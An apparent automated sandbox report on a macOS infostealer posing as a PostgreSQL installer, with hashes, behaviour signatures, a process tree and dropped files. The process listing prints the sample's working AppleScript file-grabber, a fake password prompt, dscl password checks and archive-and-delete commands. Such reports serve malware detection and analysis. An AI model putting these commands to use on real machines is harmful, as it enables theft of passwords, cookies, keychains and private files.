Analysis
-
max time kernel
105s -
max time network
121s -
platform
macos-10.15_amd64 -
resource
macos-20240410-en -
resource tags
arch:amd64arch:i386image:macos-20240410-enkernel:19b77alocale:en-usos:macos-10.15-amd64system -
submitted
24-05-2024 04:13
Static task
static1
General
-
Target
PostgreSQL_v.8.24.dmg
-
Size
8.5MB
-
MD5
e5375e47d4aa57e099bd80680afc9df3
-
SHA1
222fccee4cbc41a5612a3d3ed034bfb311f2a6bb
-
SHA256
01c9714f985ea18e3d62c611a83c36780d74617c2b284214c7fd06ba4aa78790
-
SHA512
836d37a23705abc4114d7153ad65a24465db9d4ece63856780dc2a16c596334be92af99bbf6c711acd688c50867b4fa775bb3f912d128ea6eff1d3ee592b0b82
-
SSDEEP
98304:c/gmaYwRcXEcwxMpiosLk9mU77yzl+mF4Ncsekgdsj1CwudKByOudKByrZkVypHS:cQfcwhosfjDpkKW75h5ryuoMYkUw
Malware Config
Signatures
-
Queries the macOS version information. 1 TTPs 2 IoCs
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
-
System Checks 1 TTPs 2 IoCs
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox.
Processes:
ioc process sh -c "system_profiler SPHardwareDataType" system_profiler SPHardwareDataType -
File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces to indicate to what was done within a network and how. Removal of these files can occur.
-
AppleScript 1 TTPs 8 IoCs
AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.
Processes:
ioc process osascript -e "set baseFolderPath to (path to home folder as text) & \"749359547\"" -e "set fileGrabberFolderPath to (path to home folder as text) & \"749359547:FileGrabber:\"" -e "tell application \"Finder\"" -e "set username to short user name of (system info)" -e try -e "if not (exists folder fileGrabberFolderPath) then" -e "make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}" -e "end if" -e "set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")" -e try -e "duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing" -e "end try" -e "set homePath to path to home folder as string" -e "set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"" -e try -e "duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing" -e "end try" -e "set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}" -e "set desktopFiles to every file of desktop" -e "set documentsFiles to every file of folder \"Documents\" of (path to home folder)" -e "repeat with aFile in (desktopFiles & documentsFiles)" -e "set fileExtension to name extension of aFile" -e "if fileExtension is in extensionsList then" -e "set fileSize to size of aFile" -e "if fileSize ≤ 51200 then" -e "duplicate aFile to folder fileGrabberFolderPath with replacing" -e "end if" -e "end if" -e "end repeat" -e "end try" -e "end tell" sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'" osascript -e "display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop" sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'" osascript -e "tell application \"Terminal\" to set visible of front window to false" sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'" osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer" sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"749359547\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"749359547:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'" -
Resource Forking 1 TTPs 2 IoCs
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.
Processes:
ioc process /System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper /System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
Processes
-
/bin/shsh -c "sudo /bin/zsh -c \"open /Volumes/PostgreSQL\""1⤵PID:558
-
/bin/bashsh -c "sudo /bin/zsh -c \"open /Volumes/PostgreSQL\""1⤵PID:558
-
/usr/bin/sudosudo /bin/zsh -c "open /Volumes/PostgreSQL"1⤵PID:558
-
/bin/zsh/bin/zsh -c "open /Volumes/PostgreSQL"2⤵PID:559
-
/usr/bin/openopen /Volumes/PostgreSQL2⤵PID:559
-
/usr/libexec/xpcproxyxpcproxy com.apple.spindump1⤵PID:561
-
/usr/sbin/spindump/usr/sbin/spindump1⤵PID:561
-
/usr/libexec/xpcproxyxpcproxy com.apple.tailspind1⤵PID:562
-
/usr/libexec/xpcproxyxpcproxy com.apple.spindump_agent1⤵PID:563
-
/usr/libexec/tailspind/usr/libexec/tailspind1⤵PID:562
-
/usr/libexec/spindump_agent/usr/libexec/spindump_agent1⤵PID:563
-
/usr/libexec/xpcproxyxpcproxy com.apple.geod1⤵PID:573
-
/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod1⤵PID:573
-
/usr/libexec/xpcproxyxpcproxy com.apple.geod1⤵PID:574
-
/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod1⤵PID:574
-
/usr/libexec/xpcproxyxpcproxy com.apple.secinitd1⤵PID:575
-
/usr/libexec/secinitd/usr/libexec/secinitd1⤵PID:575
-
/usr/libexec/xpcproxyxpcproxy com.apple.nehelper1⤵PID:577
-
/usr/libexec/nehelper/usr/libexec/nehelper1⤵PID:577
-
/usr/libexec/xpcproxyxpcproxy com.apple.AddressBook.ContactsAccountsService1⤵PID:578
-
/System/Library/Frameworks/AddressBook.framework/Executables/ContactsAccountsService/System/Library/Frameworks/AddressBook.framework/Executables/ContactsAccountsService1⤵PID:578
-
/usr/libexec/xpcproxyxpcproxy com.apple.routined1⤵PID:582
-
/usr/libexec/routined/usr/libexec/routined LAUNCHED_BY_LAUNCHD1⤵PID:582
-
/usr/libexec/xpcproxyxpcproxy com.apple.Maps.mapspushd1⤵PID:583
-
/System/Library/CoreServices/mapspushd/System/Library/CoreServices/mapspushd1⤵PID:583
-
/usr/libexec/xpcproxyxpcproxy com.apple.neagent.878568F8-CCE5-4157-8315-22F20DC8FB0A1⤵PID:586
-
/usr/libexec/neagent/usr/libexec/neagent1⤵PID:586
-
/usr/libexec/xpcproxyxpcproxy com.apple.pbs1⤵PID:588
-
/System/Library/CoreServices/pbs/System/Library/CoreServices/pbs1⤵PID:588
-
/usr/libexec/xpcproxyxpcproxy com.apple.TextInputMenuAgent1⤵PID:589
-
/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent1⤵PID:589
-
/usr/libexec/xpcproxyxpcproxy com.apple.quicklook.ui.helper1⤵PID:590
-
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper1⤵PID:590
-
/usr/libexec/xpcproxyxpcproxy com.apple.Terminal.21001⤵PID:591
-
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal1⤵PID:591
-
/usr/bin/loginlogin -pf run2⤵PID:595
-
/bin/zsh-zsh3⤵PID:598
-
/usr/libexec/path_helper/usr/libexec/path_helper -s4⤵PID:599
-
/usr/bin/localelocale LC_CTYPE4⤵PID:600
-
/usr/bin/loginlogin -pf run2⤵PID:602
-
/bin/zsh-zsh3⤵PID:603
-
/usr/libexec/path_helper/usr/libexec/path_helper -s4⤵PID:604
-
/usr/bin/localelocale LC_CTYPE4⤵PID:605
-
/Volumes/PostgreSQL/PostgreSQL/Volumes/PostgreSQL/PostgreSQL4⤵PID:606
-
/usr/libexec/xpcproxyxpcproxy com.apple.metadata.mdwrite1⤵PID:592
-
/usr/libexec/xpcproxyxpcproxy com.apple.siri.context.service1⤵PID:594
-
/System/Library/PrivateFrameworks/ContextKit.framework/Versions/A/XPCServices/ContextService.xpc/Contents/MacOS/ContextService/System/Library/PrivateFrameworks/ContextKit.framework/Versions/A/XPCServices/ContextService.xpc/Contents/MacOS/ContextService1⤵PID:594
-
/usr/libexec/xpcproxyxpcproxy com.apple.audio.systemsoundserverd1⤵PID:596
-
/usr/sbin/systemsoundserverd/usr/sbin/systemsoundserverd1⤵PID:596
-
/usr/libexec/xpcproxyxpcproxy com.apple.AccountPolicyHelper1⤵PID:597
-
/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper1⤵PID:597
-
/usr/libexec/xpcproxyxpcproxy com.apple.audio.AudioComponentRegistrar1⤵PID:601
-
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon1⤵PID:601
-
/bin/shsh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"1⤵PID:607
-
/bin/bashsh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"1⤵PID:607
-
/usr/bin/osascriptosascript -e "tell application \"Terminal\" to set visible of front window to false"1⤵PID:607
-
/bin/shsh -c "mkdir /Users/run/749359547"1⤵PID:608
-
/bin/bashsh -c "mkdir /Users/run/749359547"1⤵PID:608
-
/bin/mkdirmkdir /Users/run/7493595471⤵PID:608
-
/bin/shsh -c sw_vers1⤵PID:609
-
/bin/bashsh -c sw_vers1⤵PID:609
-
/usr/bin/sw_verssw_vers1⤵PID:609
-
/bin/shsh -c "system_profiler SPHardwareDataType"1⤵PID:610
-
/bin/bashsh -c "system_profiler SPHardwareDataType"1⤵PID:610
-
/usr/sbin/system_profilersystem_profiler SPHardwareDataType1⤵PID:610
-
/usr/libexec/xpcproxyxpcproxy com.apple.icloud.findmydeviced1⤵PID:612
-
/usr/libexec/findmydeviced/usr/libexec/findmydeviced1⤵PID:612
-
/bin/shsh -c "system_profiler SPDisplaysDataType"1⤵PID:613
-
/bin/bashsh -c "system_profiler SPDisplaysDataType"1⤵PID:613
-
/usr/sbin/system_profilersystem_profiler SPDisplaysDataType1⤵PID:613
-
/bin/shsh -c "dscl /Local/Default -authonly run \"\""1⤵PID:615
-
/bin/bashsh -c "dscl /Local/Default -authonly run \"\""1⤵PID:615
-
/usr/bin/dscldscl /Local/Default -authonly run1⤵PID:615
-
/bin/shsh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"1⤵PID:616
-
/bin/bashsh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"1⤵PID:616
-
/usr/bin/osascriptosascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"1⤵PID:616
-
/bin/shsh -c "dscl /Local/Default -authonly run root"1⤵PID:619
-
/bin/bashsh -c "dscl /Local/Default -authonly run root"1⤵PID:619
-
/usr/bin/dscldscl /Local/Default -authonly run root1⤵PID:619
-
/bin/shsh -c "mkdir -p '/Users/run/749359547/Chromium/Chrome'"1⤵PID:620
-
/bin/bashsh -c "mkdir -p '/Users/run/749359547/Chromium/Chrome'"1⤵PID:620
-
/bin/mkdirmkdir -p /Users/run/749359547/Chromium/Chrome1⤵PID:620
-
/bin/shsh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"749359547\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"749359547:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"1⤵PID:621
-
/bin/bashsh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"749359547\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"749359547:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"1⤵PID:621
-
/usr/bin/osascriptosascript -e "set baseFolderPath to (path to home folder as text) & \"749359547\"" -e "set fileGrabberFolderPath to (path to home folder as text) & \"749359547:FileGrabber:\"" -e "tell application \"Finder\"" -e "set username to short user name of (system info)" -e try -e "if not (exists folder fileGrabberFolderPath) then" -e "make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}" -e "end if" -e "set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")" -e try -e "duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing" -e "end try" -e "set homePath to path to home folder as string" -e "set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"" -e try -e "duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing" -e "end try" -e "set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}" -e "set desktopFiles to every file of desktop" -e "set documentsFiles to every file of folder \"Documents\" of (path to home folder)" -e "repeat with aFile in (desktopFiles & documentsFiles)" -e "set fileExtension to name extension of aFile" -e "if fileExtension is in extensionsList then" -e "set fileSize to size of aFile" -e "if fileSize ≤ 51200 then" -e "duplicate aFile to folder fileGrabberFolderPath with replacing" -e "end if" -e "end if" -e "end repeat" -e "end try" -e "end tell"1⤵PID:621
-
/usr/libexec/xpcproxyxpcproxy com.apple.DesktopServicesHelper.49722E56-C6E3-457D-831C-1188AB3D9C671⤵PID:626
-
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper1⤵PID:626
-
/bin/shsh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/749359547 /Users/run/749359547.zip --norsrc --noextattr"1⤵PID:627
-
/bin/bashsh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/749359547 /Users/run/749359547.zip --norsrc --noextattr"1⤵PID:627
-
/usr/bin/dittoditto -c -k --sequesterRsrc --keepParent /Users/run/749359547 /Users/run/749359547.zip --norsrc --noextattr1⤵PID:627
-
/bin/shsh -c "rm -rf /Users/run/749359547"1⤵PID:628
-
/bin/bashsh -c "rm -rf /Users/run/749359547"1⤵PID:628
-
/bin/rmrm -rf /Users/run/7493595471⤵PID:628
-
/bin/shsh -c "rm /Users/run/749359547.zip"1⤵PID:629
-
/bin/bashsh -c "rm /Users/run/749359547.zip"1⤵PID:629
-
/bin/rmrm /Users/run/749359547.zip1⤵PID:629
-
/bin/shsh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"1⤵PID:630
-
/bin/bashsh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"1⤵PID:630
-
/usr/bin/osascriptosascript -e "display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop"1⤵PID:630
-
/usr/libexec/xpcproxyxpcproxy com.apple.ReportMemoryException1⤵PID:631
-
/usr/libexec/ReportMemoryException/usr/libexec/ReportMemoryException1⤵PID:631
-
/usr/libexec/xpcproxyxpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E1⤵PID:633
-
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService1⤵PID:633
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
/Library/Preferences/com.apple.networkextension.uuidcache.plistFilesize
355B
MD5a6ef4856e99c9d8e1d9bb762c5a8503a
SHA125d5405ad91791b716ae5a56b37aa2b393854967
SHA256232441aa129d4f21999860b8bf31db4b8617df9f7d32ef5f25a383edff82d9fa
SHA512582fa1ea60766a5a4e99b295a8ed98c94f6bab45e42b7e8db61e9ad645f531891082cd457bfd11d660195af86f02c4ed93589e6e6daded683cff2d8319bbc489
-
/Users/run/./749359547/Chromium/Chrome/Autofill0Filesize
90KB
MD54e9060f76c1cb5b54005dc6640a58f0d
SHA104a1e6791ae55612d9b63f23ccb37eec398b3d27
SHA2565b6dd3116e1d3ecbf6d07ecfc03f1537ab00ce91336cc7c6cddda6df0c9984d3
SHA512be921e02bb810fb867c1de3e3c2a9c3b04c84188d6a9eae60b73558bd4748c1451161da8fba2c8e74f225be4b8a6f0e98276fe1e397b0083fcbbd4ebdf32e148
-
/Users/run/./749359547/Chromium/Chrome/Cookies2Filesize
20KB
MD52a3fa78b5f55b529a2698ad187c80204
SHA1cbbda35512038de511ac23b0aed12e9e86bcc796
SHA256d52ad17cc5096119732f06311ef2e25005c2a00f551c9684e2d655cbc846455b
SHA512e9b113ec0c6a888e059cf625b0bfb128d11a55970fed12df30848c9f836c5f36b2660abb4e2a820e7dedd6f0ead312edec1c6cd645f14091d98b42f696bda9ab
-
/Users/run/./749359547/Chromium/Chrome/Password1Filesize
40KB
MD5b6914d8e5cb470236eceed8d6f8b4fb7
SHA1cdff8880e9fa7630fc8d57af4669365b5ab29b60
SHA25645bda2415419c24d2526ae60cae5ee1d66bc8d2cc986bb9e94c0f3c414af06c1
SHA5121c491cfeb2b883ed20a43e16d7bf620520f4b770c8727ffb83e02554aa6aa54def4732460bcff82014050f7a1fba38e01f5570cacfbfcef6da6f2f795dc56ee7
-
/Users/run/./749359547/Sysinfo.txtFilesize
1KB
MD531717a21202f4dbab34a72c86ae4f3f2
SHA178fab4a3136000513a8f66f2d81d19cb2473338d
SHA2566e50323737f1ebceb1d9f4e1fb36e5b02ff684de7711f54df08128e966f130da
SHA5124c79b4b4705b897f2e43aec1ad622df2af929fc58a4e7c44d052b2e39c789bb266d4efc150e00896ac530aede6187c60dba572e78ada2b620f2f4e46f0c6cf5c
-
/Users/run/./749359547/login-keychainFilesize
104KB
MD588fdb5b7b0b1d62c1a0a85d11c89695f
SHA18ad846cb1ae680be0741cd6b70ea1b1d66c4f618
SHA25641189841ac6673809b05660649817ee15af631d04f00f8f828762e674ff04156
SHA512c5edce0d57f069e1d41313a62d507158e83bd7d7518e83776873fb6b5a3035e09a44f2f022d218b09c99953ecd72d0aaa1df127b8d6607f9aa10678158350a2d
-
/Users/run/./749359547/password-enteredFilesize
4B
MD563a9f0ea7bb98050796b649e85481845
SHA1dc76e9f0c0006e8f919e0c515c66dbba3982f785
SHA2564813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2
SHA51299adc231b045331e514a516b4b7680f588e3823213abe901738bc3ad67b2f6fcb3c64efb93d18002588d3ccc1a49efbae1ce20cb43df36b38651f11fa75678e8
-
/Users/run/Library/Caches/GeoServices/ActiveTileGroup.pbdFilesize
124KB
MD5559403b5422f501e553161494a4538c8
SHA14cb61b47146ae079f6b75f46bc0ded643f7bb4e3
SHA2560acdd47c5e23986768f410740a94895b6a528925105f922671c713c2145fcb2e
SHA512233e847226c9fbd548ce1f4d2a24246ff076fec156a386a7065aae1f9a8f9c631ebf1926f0e1cc6fac645806be766ccf80bb8e662618ae9297be835874f958b7
-
/Users/run/Library/Caches/GeoServices/Resources/altitude-1285.xmlFilesize
179KB
MD59a43af57707d2fb460832049d1f217d1
SHA1056d813f8cb5198ca82072f7e3484f38ea5267f8
SHA2567224f8828694ed74a8353567e4d84da188d15a993a4a75938f8409cb49218e7c
SHA5121f33175f5d0958c79540a627552f71c6960b6ff19c9b2b0aa604c00bfeff216f6ea2ec3a22ef91ad8d7249597fdf5ad49ddbf5f4aef71b397e785152474954d7
-
/dev/ttys000MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
/var/folders/zz/zyxvpxvq6csfxvn_n00000sm00006d/C//mds/mdsDirectory.dbFilesize
47KB
MD50e4a0d1ceb2af6f0f8d0167ce77be2d3
SHA1414ba4c1dc5fc8bf53d550e296fd6f5ad669918c
SHA256cca093bcfc65e25dd77c849866e110df72526dffbe29d76e11e29c7d888a4030
SHA5121dc5282d27c49a4b6f921ba5dfc88b8c1d32289df00dd866f9ac6669a5a8d99afeda614bffc7cf61a44375ae73e09cd52606b443b63636977c9cd2ef4fa68a20
-
/var/folders/zz/zyxvpxvq6csfxvn_n00000sm00006d/C//mds/mdsObject.dbFilesize
4KB
MD5d3a1859e6ec593505cc882e6def48fc8
SHA1f8e6728e3e9de477a75706faa95cead9ce13cb32
SHA2563ebafa97782204a4a1d75cfec22e15fcdeab45b65bab3b3e65508707e034a16c
SHA512ea2a749b105759ea33408186b417359deffb4a3a5ed0533cb26b459c16bb3524d67ede5c9cf0d5098921c0c0a9313fb9c2672f1e5ba48810eda548fa3209e818